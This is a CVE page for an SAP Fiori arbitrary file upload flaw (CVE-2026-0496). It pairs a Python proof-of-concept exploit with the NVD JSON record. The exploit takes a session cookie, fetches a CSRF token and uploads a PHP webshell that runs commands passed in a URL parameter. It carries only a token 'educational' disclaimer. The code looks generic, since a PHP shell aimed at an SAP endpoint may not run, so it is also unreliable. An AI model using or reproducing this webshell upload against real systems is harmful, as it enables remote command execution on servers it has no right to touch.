CVE-2026-0496

#!/usr/bin/env python3 # CVE-2026-0496 PoC - SAP Fiori Arbitrary File Upload # Note: This PoC is for educational and authorized testing purposes only import requests import sys TARGET_URL = "https://<sap-host>/sap/bc/ui5_ui5/sap/arfb_recon/" # Replace with target UPLOAD_ENDPOINT = "upload" # Adjust based on actual endpoint def create_webshell(): """Create a simple webshell for testing""" webshell_content = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" return webshell_content def upload_file(session_cookie): """Upload malicious file without proper validation""" files = { 'file': ('test.php', create_webshell(), 'application/x-php') } headers = { 'Cookie': f'SAP_SESSIONID={session_cookie}', 'X-CSRF-Token': 'fetch' # Get CSRF token first } # Step 1: Get CSRF token response = requests.get(TARGET_URL, headers=headers, verify=False) csrf_token = response.headers.get('X-CSRF-Token', '') # Step 2: Upload file headers['X-CSRF-Token'] = csrf_token upload_url = TARGET_URL + UPLOAD_ENDPOINT try: response = requests.post(upload_url, files=files, headers=headers, verify=False) if response.status_code == 200: print("[+] File uploaded successfully") return True else: print(f"[-] Upload failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("CVE-2026-0496 PoC - SAP Fiori File Upload") print("Requires authenticated session with high privileges") # Usage: python poc.py <session_cookie> if len(sys.argv) > 1: upload_file(sys.argv[1]) else: print("Usage: python poc.py <session_cookie>")

{"cve": {"id": "CVE-2026-0496", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:51.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to upload any file (including script files) without proper file format validation. This has low impact on confidentiality, integrity and availability of the application."}, {"lang": "es", "value": "La aplicación SAP Fiori Reconciliación de Saldos Intercompañía permite a un atacante con privilegios elevados subir cualquier archivo (incluyendo archivos de script) sin una validación adecuada del formato de archivo. Esto tiene un bajo impacto en la confidencialidad, integridad y disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://me.sap.com/notes/3565506", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}